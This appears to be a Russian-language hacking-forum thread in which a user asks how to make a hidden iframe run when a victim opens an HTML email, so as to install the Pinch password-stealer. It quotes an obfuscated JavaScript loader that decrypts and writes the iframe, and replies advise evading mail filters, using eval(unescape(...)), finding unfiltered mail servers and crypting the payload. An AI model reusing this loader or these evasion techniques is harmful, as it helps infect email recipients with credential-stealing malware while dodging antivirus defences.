Плз подскажите как сделать ифрем что бы я прислал письмо в виде хтмл, жертва запустила и сработал ифрейм? Если просто отсылаешь то антивирус почты высвечивает, а если закодировать вот так
(<script>function load(code,dfunc,anticasp){eval(dfunc);decrypt(code );}load('<`B15ni[X1hI"ZQQFx;;ggg.oMXi1!i1.FZFYiQ.\'X;`Y(i9.FZF"[g`(QZI"u"[Zi`lZQI"u"><;`B15ni>',unescape('function decrypt%28n%29%7Bvar l%2Cch%2Cind%2Cq%3D%22%22%2Ckey%3D%22OD%26%3Ax9T6H %40fBAC%23y_wgloSEb%7EK %5BchZei%60a5z-%7Bjv%21Pk%7Cr1mnYU%7DqV7%2F%3BpF%5DsXG%3DILtQJ0u% 5C%272Md%284%2A%22%3Bfor%28l%3D0%3Bl%3Cn.length%3B l%2B%2B%29%7Bch%3Dn.charAt%28l%29%3Bind%3Dkey.inde xOf%28ch%29%3Bif%28ind%3E-1%29%7Bif%28ind%3D%3D0%29%7Bind %3D79%7Dq%2B%3Dkey.charAt%28ind-1%29%7D else %7Bq%2B%3Dch%7D%7D%3Bdocument.write%28q%29%7D'));</script>)

то не работает, а на страничке обычной такой код работает! Что делать скажите плз!

На почтовых серверах стоят фильтры... Ищи либо способы их обхода, либо активные Хss

Мне ненадо xss, мне надо загрузить пинч через ice, токо через почту, как обойти эти фильтры? Ведь если можно отсылать хтмл письмо, то поидее должно както работать!

хтмл и скрипт это не одинаковые вещи.

Так а че тогда делать?

eval(unescape('%00%00%00'));
Попробуй так. Ищи почтовые сервера которые не фильтруют извесные тебе способы кодирования, или если хорошо кодиш криптуй своим способом.

Честно вообще не шарю как это делаеть) Блин ну кто может сказать:"Я помогу делай так и все" и что бы был хепи энд, надо такую фишку полюбому залабать! Кто поможет?